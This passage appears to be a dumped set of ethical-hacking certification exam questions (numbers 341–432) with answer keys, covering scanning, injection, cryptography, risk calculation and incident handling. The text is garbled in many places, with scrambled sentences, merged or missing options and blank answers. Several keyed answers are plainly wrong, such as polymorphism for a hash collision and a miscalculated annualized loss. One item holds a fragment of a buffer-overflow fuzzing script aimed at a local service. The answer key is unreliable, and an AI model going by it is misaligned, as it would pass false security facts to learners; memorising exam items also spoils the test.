D. The employees can not provide any information; but, anyway, he/she will provide the name of the person in
charge.
Correct Answer: C
Section: (none)
Explanation
QUESTION 341
A well-intentioned researcher discovers a vulnerability on the web site of a major corporation. What should he
do?
A. Ignore it.
B. Try to sell the information to a well-paying party on the dark web.
C. Notify the web site owner so that corrective action be taken as soon as possible to patch the vulnerability.
D. Exploit the vulnerability without harming the web site owner so that attention be drawn to the problem.
Correct Answer: C
Section: (none)
Explanation
QUESTION 342
Rebecca commonly sees an error on her Windows system that states that a Data Execution Prevention (DEP)
error has taken place. Which of the following is mostlikely taking place?
A. A race condition is being exploited, and the operating system is containing the malicious process.
B. A page fault is occurring, which forces the operating system to write data from the hard drive.
C. Malware is executing in either ROM or a cache memory area.
D. Malicious code is attempting to execute instruction in a non-executable memory region.
Correct Answer: D
Section: (none)
Explanation
QUESTION 343
Attempting an injection attack on a web server based on responses to True/False questions is called which of
the following?
A. Blind SQLi
B. DMS-specific SQLi
C. Classic SQLi
D. Compound SQLi
Correct Answer: A
Section: (none)
Explanation
QUESTION 344
In order to have an anonymous Internet surf, which of the following is best choice?
A. Use SSL sites when enteringpersonal information

B. Use Tor network with multi-node
C. Use shared WiFi
D. Use public VPN
Correct Answer: B
Section: (none)
Explanation
QUESTION 345
A penetration test was done at a company. After the test, a report was written and given to the company's IT
authorities. A section from the report is shown below:
Access List should be written between VLANs. Port security should be enabled for the intranet.
A security solution which filters data packets should be set between intranet (LAN) and DMZ. AWAF should be
used in front of the web applications.
According to the section from the report, which of the following choice is true?
A. MAC Spoof attacks cannot be performed.

B. Possibility of SQL Injection attack is eliminated.
C. A stateful firewall can be used between intranet (LAN) and DMZ.
D. There is access control policy between VLANs.
Correct Answer: C
Section: (none)
Explanation
QUESTION 346
Websites and web portals that provide web services commonly use the Simple Object Access Protocol SOAP.
Which of the following is an incorrect definition orcharacteristics in the protocol?
A. Based on XML
B. Provides a structured model formessaging
C. Exchanges data between webservices
D. Only compatible with the application protocol HTTP
Correct Answer: D
Section: (none)
Explanation
QUESTION 347
An attacker with access to the inside network of a small company launches a successful STP manipulation
attack. What will he do next?
A. He will create a SPAN entry on the spoofed root bridge and redirect traffic to his computer.
B. He will activate OSPF on the spoofed root bridge.
C. He will repeat the same attack against all L2 switches of the network.
D. He will repeat this action so that it escalates to a DoS attack.
Correct Answer: A
Section: (none)
Explanation
QUESTION 348
A large mobile telephony and data network operator has a data that houses network elements. These are
essentially large computers running on Linux. The perimeter of the data center is secured with firewalls and IPS
systems. What is the best security policy concerning this setup?
A. Network elements must be hardened with user ids and strong passwords. Regular security tests and audits
should be performed.
B. As long as the physical access to the network elements is restricted, there is no need for additional
measures.
C. There is no need for specific security measures on the network elements as long as firewalls and IPS
systems exist.
D. The operator knows that attacks and down time are inevitable and should have a backup site.
Correct Answer: A
Section: (none)
Explanation
QUESTION 349
When purchasing a biometric system, one of the considerations that should be reviewed is the processing
speed. Which of the following best describes what it ismeant by processing?
A. The amount of time it takes to convert biometric data into a template on a smart card.
B. The amount of time and resources that are necessary to maintain a biometric system.
C. The amount of time it takes to be either accepted or rejected form when an individual provides Identification
and authentication information.
D. How long it takes to setup individual user accounts.
Correct Answer: C
Section: (none)
Explanation
QUESTION 350
Due to a slow down of normal network operations, IT department decided to monitor internet traffic for all of the
employees. From a legal stand point, what would betroublesome to take this kind of measure?
A. All of the employees would stop normal work activities

B. IT department would be telling employees who the boss is
C. Not informing the employees that they are going to be monitored could be an invasion of privacy.
D. The network could still experience traffic slow down.
Correct Answer: C
Section: (none)
Explanation
QUESTION 351
In many states sending spam is illegal. Thus, the spammers have techniques to try and ensure that no one
knows they sent the spam out to thousands of usersat a time. Which of the following best describes what
spammers use to hide the origin of these types of e-mails?
A. A blacklist of companies that have their mail server relays configured to allow traffic only to their specific
domain name.
B. Mail relaying, which is a technique of bouncing e-mail from internal to external mails servers continuously.
C. A blacklist of companies that have their mail server relays configured to be wide open.
D. Tools that will reconfigure a mail server's relay component to send the e-mail back to the spammers
occasionally.
Correct Answer: B
Section: (none)
Explanation
QUESTION 352
You are an Ethical Hacker who is auditing the ABC company. When you verify the NOC one of the machines
has 2 connections, one wired and the other wireless. When you verify the configuration of this Windows system
you find two static routes.
route add 10.0.0.0 mask 255.0.0.0 10.0.0.1

route add 0.0.0.0 mask 255.0.0.0 199.168.0.1What is the main purpose of those static routes?
A. Both static routes indicate that the traffic is external with different gateway.
B. The first static route indicates that the internal traffic will use an external gateway and the second static
route indicates that the traffic will be rerouted.
C. Both static routes indicate that the traffic is internal with different gateway.
D. The first static route indicates that the internal addresses are using the internal gateway and the second
static route indicates that all the traffic that is not internal must go to an external gateway.
Correct Answer: D
Section: (none)
Explanation
QUESTION 353
What is the correct process for the TCP three-way handshake connection establishment and connection
termination?
A. Connection Establishment: FIN, ACK-FIN, ACK ConnectionTermination: SYN, SYN-ACK,ACK

B. Connection Establishment: SYN, SYN-ACK,ACK ConnectionTermination: ACK, ACK-SYN,SYN
C. Connection Establishment: ACK, ACK-SYN, SYN ConnectionTermination: FIN, ACK-FIN,ACK
D. Connection Establishment: SYN, SYN-ACK,ACK ConnectionTermination: FIN, ACK-FIN,ACK
Correct Answer: D
Section: (none)
Explanation
QUESTION 354
Emil uses nmap to scan two hosts using this command. nmap -sS -T4 -O 192.168.99.1 192.168.99.7
He receives this output:
Nmap scan report for 192.168.99.1 Host is up(0.00082s latency).

Not shown: 994 filtered ports PORT
STATE SERVICE
21/tcp open ftp
23/tcp open telnet 53/tcp
open domain 80/tcp
open http 161/tcp
closed snmp
MAC Address: B0:75:D5:33:57:74 (ZTE)
Device type: general purpose Running: Linux2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details:
Linux 2.6.9 - 2.6.33 Network Distance: 1 hop
Nmap scan report for 192.168.99.7 Host is up(0.000047s latency).

All 1000 scanned ports on 192.168.99.7 are closed
Too many fingerprints match this host to give specific OS details NetworkDistance: 0 hops
What is his conclusion?
A. Host 192.168.99.7 is aniPad.

B. He performed a SYN scan and OS scan on hosts 192.168.99.1 and 192.168.99.7.
C. Host 192.168.99.1 is the host that he launched the scan from. D. Host192.168.99.7 isdown.
Correct Answer: B
Section: (none)
Explanation
QUESTION 355
You're doing an internal security audit and you want to find out what ports are open on all the servers. What is
the best way to find out?
A. Scan servers with Nmap

B. Physically go to eachserver
C. Scan servers with MBSA
D. Telent to every port on eachserver
Correct Answer: A
Section: (none)
Explanation
QUESTION 356
The establishment of a TCP connection involves a negotiation called 3 way handshake. What type of message
sends the client to the server in order to begin thisnegotiation?
A. RST
B. ACK
C. SYN-ACK
D. SYN
Correct Answer: D
Section: (none)
Explanation
QUESTION 357
Internet Protocol Security IPSec is actually a suite of protocols. Each protocol within the suite provides different
functionality. Collective IPSec does everything except.
A. Protect the payload and the headers

B. Authenticate
C. Encrypt
D. Work at the Data Link Layer
Correct Answer: D
Section: (none)
Explanation
QUESTION 358
Todd has been asked by the security officer to purchase a counter-based authentication system. Which of the
following best describes this type of system?
A. A biometric system that bases authentication decisions on behavioral attributes.

B. A biometric system that bases authentication decisions on physical attributes.
C. An authentication system that creates one-time passwords that are encrypted with secret keys.
D. An authentication system that uses passphrases that are converted into virtual passwords.
Correct Answer: C
Section: (none)
Explanation
QUESTION 359
An attacker attaches a rogue router in a network. He wants to redirect traffic to a LAN attached to his router as
part of a man-in-the-middle attack. What measureon behalf of the legitimate admin can mitigate this attack?
A. Only using OSPFv3 will mitigate this risk.
B. Make sure that legitimate network routers are configured to run routing protocols with authentication.
C. Redirection of the traffic cannot happen unless the admin allows it explicitly.
D. Disable all routing protocols and only use static routes.
Correct Answer: B
Section: (none)
Explanation
QUESTION 360
Look at the following output. What did the hacker accomplish?
; <<>> DiG 9.7.-P1 <<>> axfr domam.com @192.168.1.105

;; global options: +cmd
domain.com. 3600 IN SOA srv1.domain.com. hostsrv1.domain.com. 131 900 600 86400 3600
domain.com. 600 IN A 192.168.1.102
domain.com. 600 IN A 192.168.1.105 domain.com. 3600 IN NS srv1.domain.com.domain.com. 3600 IN NS
srv2.domain.com.vpn.domain.com. 3600 IN A 192.168.1.1
server.domain.com. 3600 IN A 192.168.1.3
office.domain.com. 3600 IN A 192.168.1.4
remote.domain.com. 3600 IN A 192.168. 1.48
support.domain.com. 3600 IN A 192.168.1.47
ns1.domain.com. 3600 IN A 192.168.1.41
ns2.domain.com. 3600 IN A 192.168.1.42
ns3.domain.com. 3600 IN A 192.168.1.34
ns4.domain.com. 3600 IN A 192.168.1.45
srv1.domain.com. 3600 IN A 192.168.1.102
srv2.domain.com. 1200 IN A 192.168.1.105
domain.com. 3600 INSOA srv1.domain.com. hostsrv1.domain.com. 131 900 600 86400 3600
;; Query time: 269 msec
;; SERVER: 192.168.1.105#53(192.168.1.105)
;; WHEN: Sun Aug 11 20:07:59 2013
;; XFR size: 65 records (messages 65, bytes 4501)
A. The hacker used whois to gather publicly available records for the domain.
B. The hacker used the "fierce" tool to brute force the list of available domains.
C. The hacker listed DNS records on his owndomain.
D. The hacker successfully transfered the zone and enumerated the hosts.
Correct Answer: D
Section: (none)
Explanation
QUESTION 361
What network security concept requires multiple layers of security controls to be placed throughout an IT
infrastructure, which improves the security posture of anorganization to defend against malicious attacks or
potential vulnerabilities?
A. Security through obscurity

B. Host-Based Intrusion DetectionSystem
C. Defense in depth
D. Network-Based Intrusion DetectionSystem
Correct Answer: C
Section: (none)
Explanation
QUESTION 362
Scenario:
Victim opens the attacker's website.
1.
Attacker sets up a web site which contains interesting and attractive content like 'Do you want to make $1000 in
a day?'.
2.
Victim clicks to the interesting and attractive content url.
3.
Attacker creates a transparent 'iframe' in front of the url which victim attempt to click, so victim thinks that he/
she clicks to the 'Do you want to make $1000 in a 4.
day?' url but actually he/she clicks to the content or url that exists in the transparent 'iframe' which is setup by
the attacker.
What is the name of the attack which is mentioned in the scenario?
A. HTTP Parameter Pollution

B. HTML Injection
C. Session Fixation
D. ClickJacking Attack
Correct Answer: D
Section: (none)
Explanation
QUESTION 363
If there is an Intrusion Detection System (IDS) in intranet, which port scanning technique cannot be used?
A. Spoof Scan
B. TCP Connect scan
C. TCP SYN
D. Idle Scan
Correct Answer: C
Section: (none)
Explanation
QUESTION 364
What is correct about digital signatures?
A. A digital signature cannot be moved from one signed document to another because it is the hash of the
original document encrypted with the private key of the signing party.
B. Digital signatures may be used in different documents of the same type.
C. A digital signature cannot be moved from one signed document to another because it is a plain hash of the
document content.
D. Digital signatures are issued once for each user and can be used everywhere until they expire.
Correct Answer: A
Section: (none)
Explanation
QUESTION 365
What is not a PCI compliance recommendation?
A. Limit access to card holder data to as few individuals as possible.

B. Use encryption to protect all transmission of card holder data over any public network.
C. Rotate employees handling credit card transactions on a yearly basis to different departments.
D. Use a firewall between the public network and the payment card data.
Correct Answer: B
Section: (none)
Explanation
QUESTION 366
Which Intrusion Detection System is best applicable for large environments where critical assets on the network
need extra security and is ideal for observingsensitive network segments?
A. Network-based intrusion detectionsystem (NIDS)

B. Host-based intrusion detection system (HIDS)
C. Firewalls
D. Honeypots
Correct Answer: A
Section: (none)
Explanation
QUESTION 367
An attacker is using nmap to do a ping sweep and a port scanning in a subnet of 254 addresses. In which
ordershould he perform these steps?
A. The sequence does not matter. Both steps have to be performed against all hosts.
B. First the port scan to identify interesting services and then the ping sweep to find hosts responding to icmp
echo requests.
C. First the ping sweep to identify live hosts and then the port scan on the live hosts. This way he saves time.
D. The port scan alone is adequate. This way he saves time.
Correct Answer: C
Section: (none)
Explanation
QUESTION 368
What mechanism in Windows prevents a user from accidentally executing a potentially malicious batch (.bat) or
PowerShell (.ps1) script?
A. User Access Control (UAC)

B. Data Execution Prevention (DEP)
C. Address Space Layout Randomization (ASLR)
D. Windows firewall
Correct Answer: B
Section: (none)
Explanation
QUESTION 369
Which of the following areas is considered a strength of symmetric key cryptography when compared with
asymmetric algorithms?
A. Scalability
B. Speed
C. Key distribution
D. Security
Correct Answer: B
Section: (none)
Explanation
QUESTION 370
By using a smart card and pin, you are using a two-factor authentication that satisfies
A. Something you know and something you are

B. Something you have and something youknow
C. Something you have and something youare
D. Something you are and something youremember
Correct Answer: B
Section: (none)
Explanation
QUESTION 371
What is the difference between the AES and RSA algorithms?
A. Both are asymmetric algorithms, but RSA uses 1024-bit keys.
B. RSA is asymmetric, which is used to create a public/private key pair; AES is symmetric, which is used to
encrypt data.
C. Both are symmetric algorithms, but AES uses 256-bit keys.
D. AES is asymmetric, which is used to create a public/private key pair; RSA is symmetric, which is used to
encrypt data.
Correct Answer: B
Section: (none)
Explanation
QUESTION 372
Which of the following programming languages is most susceptible to buffer overflow attacks, due to its lack of
a built-in-bounds checking mechanism?
Code:
#include <string.h> intmain(){
char buffer[8];
""11111111111111111111111111111"");
strcpy(buffer,
}
Output: Segmentationfault
A. C#
B. Python
C. Java
D. C++
Correct Answer: D
Section: (none)
Explanation
QUESTION 373
The security administrator of ABC needs to permit Internet traffic in the host 10.0.0.2 and UDP traffic in the host
10.0.0.3. Also he needs to permit all FTP traffic tothe rest of the network and deny all other traffic. After he
applied his ACL configuration in the router nobody can access to the ftp and the permitted hosts cannot access
to the Internet. According to the next configuration what is happening in the network?
access-list 102 deny tcp any any

access-list 104 permit udp host 10.0.0.3 any
access-list 110 permit tcp host 10.0.0.2 eq www anyaccess-list 108 permit tcp any eq ftp any
A. The ACL 110 needs to be changed to port 80

B. The ACL for FTP must be before the ACL 110
C. The first ACL is denying all TCP traffic and the other ACLs are being ignored by the router
D. The ACL 104 needs to be first because is UDP
Correct Answer: C
Section: (none)
Explanation
QUESTION 374
Bob received this text message on his mobile phone: ""Hello, this is Scott Smelby from the Yahoo Bank. Kindly
contact me for a vital transaction on:
"". Which statement below is true?
scottsmelby@yahoo.com
A. This is probably a legitimate message as it comes from a respectable organization.

B. Bob should write to scottsmelby@yahoo.com to verify the identity of Scott.
C. This is a scam as everybody can get a @yahoo address, not the Yahoo customer service employees.
D. This is a scam because Bob does not know Scott.
Correct Answer: C
Section: (none)
Explanation
QUESTION 375
In an internal security audit, the white hat hacker gains control over a user account and attempts to acquire
access to another account's confidential files and information. How can he achieve this?
A. Port Scanning
B. Hacking Active Directory
C. Privilege Escalation
D. Shoulder-Surfing
Correct Answer: C
Section: (none)
Explanation
QUESTION 376
Which of the following will perform an Xmas scan using NMAP?
A. nmap -sA 192.168.1.254 B. nmap -sP 192.168.1.254 C. nmap -sX 192.168.1.254 D. nmap -sV
192.168.1.254
Correct Answer:
Section: (none)
Explanation
QUESTION 377
As an Ethical Hacker you are capturing traffic from your customer network with Wireshark and you need to find
and verify just SMTP traffic. What command inWireshark will help you to find this kind of traffic?
A. request smtp 25
B. tcp.port eq 25
C. smtp port
D. tcp.contains port 25
Correct Answer: B
Section: (none)
Explanation
QUESTION 378
Which service in a PKI will vouch for the identity of an individual or company?
A. KDC
B. CA
C. CR
D. CBC
Correct Answer: B
Section: (none)
Explanation
QUESTION 379
In IPv6 what is the major difference concerning application layer vulnerabilities compared to IPv4?
A. Implementing IPv4 security in a dual-stack network offers protection from IPv6 attacks too.
B. Vulnerabilities in the application layer are independent of the network layer. Attacks and mitigation
techniques are almost identical.
C. Due to the extensive security measures built in IPv6, application layer vulnerabilities need not be addresses.
D. Vulnerabilities in the application layer are greatly different from IPv4.
Correct Answer: B
Section: (none)
Explanation
QUESTION 380
In which phase of the ethical hacking process can Google hacking be employed? This is a technique that
involves manipulating a search string with specific operators to search for vulnerabilities.
Example:
allintitle: root passwd
A. Maintaining Access
B. Gaining Access
C. Reconnaissance
D. Scanning and Enumeration
Correct Answer: C
Section: (none)
Explanation
QUESTION 381
Which type of security feature stops vehicles from crashing through the doors of a building?
A. Turnstile
B. Bollards
C. Mantrap
D. Receptionist
Correct Answer: B
Section: (none)
Explanation
QUESTION 382
........is an attack type for a rogue Wi-Fi access point that appears to be a legitimate one offered on the
premises, but actually has been set up to eavesdrop on wireless communications. It is the wireless version of
the phishing scam. An attacker fools wireless users into connecting a laptop or mobile phone to a tainted
hotspot by posing as a legitimate provider. This type of attack may be used to steal the passwords of
unsuspecting users by either snooping the communication linkor by phishing, which involves setting up a
fraudulent web site and luring people there.
Fill in the blank with appropriate choice.
A. Collision Attack
B. Evil Twin Attack
C. Sinkhole Attack
D. Signal Jamming Attack
Correct Answer: B
Section: (none)
Explanation
QUESTION 383
Which access control mechanism allows for multiple systems to use a central authentication server (CAS) that
permits users to authenticate once and gain accessto multiple systems?
A. Role Based Access Control (RBAC)

B. Discretionary Access Control (DAC)
C. Windows authentication
D. Single sign-on
Correct Answer: D
Section: (none)
Explanation
QUESTION 384
What attack is used to crack passwords by using a precomputed table of hashed passwords?
A. Brute Force Attack

B. Hybrid Attack
C. Rainbow Table Attack
D. Dictionary Attack
Correct Answer: C
Section: (none)
Explanation
QUESTION 385
Your next door neighbor, that you do not get along with, is having issues with their network, so he yells to his
spouse the network's SSID and password and youhear them both clearly. What do you do with this
information?
A. Nothing, but suggest to him to change the network's SSID and password.
B. Sell his SSID and password to friends that come to your house, so it doesn't slow down your network.Log
onto to his network, after all it's his fault that you can get in.
C. Only use his network when you have large downloads so you don't tax your own network.
Correct Answer: A
Section: (none)
Explanation
QUESTION 386
Shellshock had the potential for an unauthorized user to gain access to a server. It affected many internet-
facing services, which OS did it not directly affect?3
A. Windows
B. Unix
C. Linux
D. OS X
Correct Answer: D
Section: (none)
Explanation
QUESTION 387
You want to analyze packets on your wireless network. Which program would you use?
A. Wireshark with Airpcap

B. Airsnort with Airpcap
C. Wireshark with Winpcap
D. Ethereal with Winpcap
Correct Answer: A
Section: (none)
Explanation
QUESTION 388
It has been reported to you that someone has caused an information spillage on their computer. You go to the
computer, disconnect it from the network, removethe keyboard and mouse, and power it down. What step in
incident handling did you just complete?
A. Containment
B. Eradication
C. Recovery
D. Discovery
Correct Answer: A
Section: (none)
Explanation
QUESTION 389
buffer=["A"] counter=50
#!/usr/bin/pythonimport socket
while len(buffer)<=100:
buffer.apend ("A"*counter)counter=counter+50
commands=
["HELP","STATS.","RTIME.","LTIME.","SRUN.","TRUN.","GMON.","GDOG.","KSTET.","GTER.","HTER.","LTER
.","KSTAN."]
for command in commands: for buffstringin buffer:
print "Exploiting" +command+":"+str(len(buffstring)) s=socket.socket(socket.AF_INET.socket.SOCK_STREAM)
A. connect(('127.0.0.1',9999))
B. recv(50) s.send(command+buffstring) s.close()
What is the code written for?
C. Buffer Overflow
D. Encryption
E. Bruteforce
F. Denial-of-service (Dos)
Correct Answer: A
Section: (none)
Explanation
QUESTION 390
An enterprise recently moved to a new office and the new neighborhood is a little risky. The CEO wants to
monitor the physical perimeter and the entrance doors 24 hours. What is the best option to do thisjob?
A. Use fences in the entrance doors.

B. Install a CCTV with cameras pointing to the entrance doors and the street.
C. Use an IDS in the entrance doors and install some of them near the corners.
D. Use lights in all the entrance doors and along the company's perimeter.
Correct Answer: B
Section: (none)
Explanation
QUESTION 391
Which of the following is a serious vulnerability in the popular OpenSSL cryptographic software library. This
weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used
to secure the Internet.
A. Heartbleed Bug
B. POODLE
C. SSL/TLS RenegotiationVulnerability
D. Shellshock
Correct Answer: A
Section: (none)
Explanation
QUESTION 392
There are several ways to gain insight on how a cryptosystem works with the goal of reverse engineering the
process. A term describes when two pieces of data result in the same value is?
A. Collision
B. Collusion
C. Polymorphism
D. Escrow
Correct Answer: C
Section: (none)
Explanation
QUESTION 393
Which of the following security policies defines the use of VPN for gaining access to an internal corporate
network?
A. Network security policy

B. Remote access policy
C. Information protection policy
D. Access control policy
Correct Answer: B
Section: (none)
Explanation
QUESTION 394
One of the Forbes 500 companies has been subjected to a large scale attack. You are one of the shortlisted
pen testers that they may hire. During the interviewwith the CIO, he emphasized that he wants to totally
eliminate all risks. What is one of the first things you should do when hired?
A. Interview all employees in the company to rule out possible insider threats.
B. Establish attribution to suspectedattackers.
C. Explain to the CIO that you cannot eliminate all risk, but you will be able to reduce risk to acceptable levels.
D. Start the Wireshark application to start sniffing networktraffic.
Correct Answer: C
Section: (none)
Explanation
QUESTION 395
Which of the following is an NMAP script that could help detect HTTP Methods such as GET, POST, HEAD,
PUT, DELETE, TRACE?
A. http-git
B. http-headers
C. http enum
D. http-methods
Correct Answer: D
Section: (none)
Explanation
QUESTION 396
Which of the following is the most important phase of ethical hacking wherein you need to spend considerable
amount of time?
A. Gaining access
B. Escalating privileges
C. Network mapping
D. Footprinting
Correct Answer: D
Section: (none)
Explanation
QUESTION 397
It is a short-range wireless communication technology that allows mobile phones, computers and other devices
to connect and communicate. This technologyintends to replace cables connecting portable devices with high
regards to security.
A. Bluetooth
B. Radio-FrequencyIdentification
C. WLAN
D. InfraRed
Correct Answer: A
Section: (none)
Explanation
QUESTION 398
"YouWon$10Grand.zip." The zip file contains a file named "HowToClaimYourPrize.docx.exe." Out of
Matthew received an email with an attachment named
to Matthew's APPDATA\IocaI directory and begins to
excitement and curiosity, Matthew opened the said file. Without his knowledge, the file copies itself
beacon toa Command-and-control server to download additional malicious binaries. What type of malware has
Matthew encountered?
A. Key-logger
B. Trojan
C. Worm
D. Macro Virus
Correct Answer: B
Section: (none)
Explanation
QUESTION 399
Which among the following is a Windows command that a hacker can use to list all the shares to which the
current user context has access?
A. NET FILE
B. NET USE
C. NET CONFIG
D. NET VIEW
Correct Answer: B
Section: (none)
Explanation
QUESTION 400
What is the approximate cost of replacement and recovery operation per year of a hard drive that has a value
of $300 given that the technician who charges $10/hr would need 10 hours to restore OS and Software and
needs further 4 hours to restore the database from the last backup to the new hard disk? Calculatethe SLE,
ARO, and ALE. Assume the EF = 1 (100%).
A. $440
B. $100
C. $1320
D. $146
Correct Answer: D
Section: (none)
Explanation
QUESTION 401
Knowing the nature of backup tapes, which of the following is the MOST RECOMMENDED way of storing
backup tapes?
A. In a cool dry environment

B. Inside the data center for faster retrieval in a fireproof safe
C. In a climate controlled facilityoffsite
D. On a different floor in the samebuilding
Correct Answer: C
Section: (none)
Explanation
QUESTION 402
Which of the following tools would MOST LIKELY be used to perform security audit on various of forms of
network systems?

B. Vulnerability scanner
C. Port scanner
D. Protocol analyzer
Correct Answer: B
Section: (none)
Explanation
QUESTION 403
Security and privacy of/on information systems are two entities that requires lawful regulations. Which of the
following regulations defines security and privacy controls for Federal information systems and organizations?
A. NIST SP 800-53
B. PCI-DSS
C. EU Safe Harbor
D. HIPAA
Correct Answer: A
Section: (none)
Explanation
QUESTION 404
A big company, who wanted to test their security infrastructure, wants to hire elite pen testers like you. During
the interview, they asked you to show sample reports from previous penetration tests. What should you do?
A. Share reports, after NDA issigned

B. Share full reports, not redacted
C. Decline but, provide references
D. Share full reports withredactions
Correct Answer: C
Section: (none)
Explanation
QUESTION 405
You are about to be hired by a well known Bank to perform penetration tests. Which of the following documents
describes the specifics of the testing, the bank's interest and your liabilities as a tester?
associated violations, and essentially protects both the
A. Service Level Agreement

B. Non-Disclosure Agreement
C. Terms of Engagement
D. Project Scope
Correct Answer: C
Section: (none)
Explanation
QUESTION 406
The practical realities facing organizations today make risk response strategies essential. Which of the
following is NOT one of the five basic responses to risk?
A. Accept
B. Mitigate
C. Delegate
D. Avoid
Correct Answer: C
Section: (none)
Explanation
QUESTION 407
A company recently hired your team of Ethical Hackers to test the security of their network systems. The
company wants to have the attack be as realisticas possible. They did not provide any information besides the
name of their company. What phase of security testing would your team jump in right away?
A. Scanning
B. Reconnaissance
C. Escalation
D. Enumeration
Correct Answer: B
Section: (none)
Explanation
QUESTION 408
TCP/IP stack fingerprinting is the passive collection of configuration attributes from a remote device during
standard layer 4 network communications. Which ofthe following tools can be used for passive OS
fingerprinting?
A. nmap
B. ping
C. tracert
D. tcpdump
Correct Answer: C
Section: (none)
Explanation
QUESTION 409
The chance of a hard drive failure is known to be once every four years. The cost of a new hard drive is $500.
EF (Exposure Factor) is about 0.5. Calculate forthe Annualized Loss Expectancy (ALE).
A. $62.5
B. $250
C. $125
D. $65.2
Correct Answer: B
Section: (none)
Explanation
QUESTION 410
Backing up data is a security must. However, it also have certain level of risks when mishandled. Which of the
following is the greatest threat posed by backups?
A. A backup is the source of Malware or illicit information
B. A backup is incomplete because no verification was performed
C. A backup is unavailable during disaster recovery
D. An unencrypted backup can be misplaced or stolen
Correct Answer: D
Section: (none)
Explanation
QUESTION 411
What kind of risk will remain even if all theoretically possible safety measures would be applied?
A. Residual risk
B. Inherent risk
C. Impact risk
D. Deferred risk
Correct Answer: A
Section: (none)
Explanation
QUESTION 412
While doing a Black box pen test via the TCP port (80), you noticed that the traffic gets blocked when you tried
to pass IRC traffic from a web enabled host. However, you also noticed that outbound HTTP traffic is being
allowed. What type of firewall is being utilized for the outbound traffic?
A. Stateful
B. Application
C. Circuit
D. Packet Filtering
Correct Answer: B
Section: (none)
Explanation
QUESTION 413
It is a widely used standard for message logging. It permits separation of the software that generates
messages, the system that stores them, and the softwarethat reports and analyzes them. This protocol is
specifically designed for transporting event messages. Which of the following is being described?
A. SNMP
B. ICMP
C. SYSLOG
D. SMS
Correct Answer: C
Section: (none)
Explanation
QUESTION 414
While doing a technical assessment to determine network vulnerabilities, you used the TCP XMAS scan. What
would be the response of all open ports?
A. The port will send an ACK

B. The port will send a SYN
C. The port will ignore the packets
D. The port will send an RST
Correct Answer: B
Section: (none)
Explanation
QUESTION 415
Which of the following tools is used by pen testers and analysts specifically to analyze links between data using
link analysis and graphs?
A. Metasploit
B. Wireshark
C. Maltego
D. Cain & Abel
Correct Answer: C
Section: (none)
Explanation
QUESTION 416
If you are to determine the attack surface of an organization, which of the following is the BEST thing to do?

B. Reviewing the need for a security clearance for each employee
C. Using configuration management to determine when and where to apply security patches
D. Training employees on the security policy regarding social engineering
Correct Answer: A
Section: (none)
Explanation
QUESTION 417
What is the best Nmap command to use when you want to list all devices in the same network quickly after you
successfully identified a server whose IP address is 10.10.0.5?
A. nmap -T4 -F10.10.0.0/24 B. nmap -T4 -q 10.10.0.0/24 C. nmap -T4 -O 10.10.0.0/24 D. nmap - T4 -r
10.10.1.0/24
Correct Answer:
Section: (none)
Explanation
QUESTION 418
You've just discovered a server that is currently active within the same network with the machine you recently
compromised. You ping it but it did not respond.What could be the case?
doesn't support ICMP
A. TCP/IP
B. ARP is disabled on the targetserver
C. ICMP could be disabled on the target server
D. You need to run the ping command with root privileges
Correct Answer: C
Section: (none)
Explanation
QUESTION 419
Which of the following BEST describes the mechanism of a Boot Sector Virus?
A. Moves the MBR to another location on the hard disk and copies itself to the original location of the
MBR
B. Moves the MBR to another location on the RAM and copies itself to the original location of the MBR
C. Overwrites the original MBR and only executes the new virus code
D. Modifies directory table entries so that directory entries point to the virus code instead of the actual
program
Correct Answer: A
Section: (none)
Explanation
QUESTION 420
What is the term coined for logging, recording and resolving events in a company?
A. Internal Procedure
B. Security Policy
C. Incident Management Process
D. Metrics
Correct Answer: C
Section: (none)
Explanation
QUESTION 421
XOR is a common cryptographic tool. 10110001 XOR 00111010 is?
A. 10111100
B. 11011000
C. 10011101
D. 10001011
Correct Answer: D
Section: (none)
Explanation
QUESTION 422
A server has been infected by a certain type of Trojan. The hacker intended to utilize it to send and
host junk mails. What type of Trojan did the hacker use?
A. Turtle Trojans
B. Ransomware Trojans
C. Botnet Trojan
D. Banking Trojans
Correct Answer: C
Section: (none)
Explanation
QUESTION 423
First thing you do every office day is to check your email inbox. One morning, you received an email
from your best friend and the subject line is quite strange.What should you do?
A. Delete the email and pretend nothing happened.

B. Forward the message to your supervisor and ask for her opinion on how to handle the situation.
company's security response team and permanently delete the message
C. Forward the message to your
from your computer.
D. Reply to the sender and ask them for more information about the message contents.
Correct Answer: C
Section: (none)
Explanation
QUESTION 424
LM hash is a compromised password hashing function. Which of the following parameters describe
The maximum password length is 14 characters.
LMHash:? I
There are no distinctions between uppercase and lowercase.
II
It's a simple algorithm, so 10,000,000 hashes can be generated per second.
III
A. I
B. I, II, and III
C. II
D. I and II
Correct Answer: B
Section: (none)
Explanation
QUESTION 425
Defining rules, collaborating human workforce, creating a backup plan, and testing the plans are
within what phase of the Incident Handling Process?
C. Recovery phase
D. Identification phase
Correct Answer: A
Section: (none)
Explanation
QUESTION 426
Which of the following is a hardware requirement that either an IDS/IPS system or a proxy server
must have in order to properly function?
A. Fast processor to help with network traffic analysis

B. They must be dual-homed
C. Similar RAM requirements
D. Fast network interface cards
Correct Answer: B
Section: (none)
Explanation
QUESTION 427
In order to show improvement of security over time, what must be developed?
A. Reports
B. Testing tools
C. Metrics
D. Taxonomy of vulnerabilities
Correct Answer: C
Section: (none)
Explanation
QUESTION 428
Passive reconnaissance involves collecting information through which of the following?
A. Social engineering
B. Network traffic sniffing
C. Man in the middle attacks
D. Publicly accessible sources
Correct Answer: D
Section: (none)
Explanation
QUESTION 429
How can rainbow tables be defeated?
A. Password salting
B. Use of non-dictionary words
C. All uppercase character passwords
D. Lockout accounts under brute force password crackingattempts
Correct Answer: A
Section: (none)
Explanation
QUESTION 430
The following is a sample of output from a penetration tester's machine targeting a machine with the
IP address of 192.168.1.106:
What is most likely taking place?

A. Ping sweep of the 192.168.1.106network
B. Remote service brute force attempt
C. Port scan of 192.168.1.106
D. Denial of service attack on 192.168.1.106
Correct Answer: B
Section: (none)
Explanation
QUESTION 431
An NMAP scan of a server shows port 25 is open. What risk could this pose?
A. Open printer sharing

B. Web portal data leak
C. Clear text authentication
D. Active mail relay
Correct Answer: D
Section: (none)
Explanation
QUESTION 432
A penetration tester is conducting a port scan on a specific host. The tester found several ports
opened that were confusing in concluding the Operating System
(OS) version installed. Considering the NMAP result below, which of the following is likely to be
installed onthe target machine by the OS?
Starting NMAP 5.21 at 2011-03-15 11:06

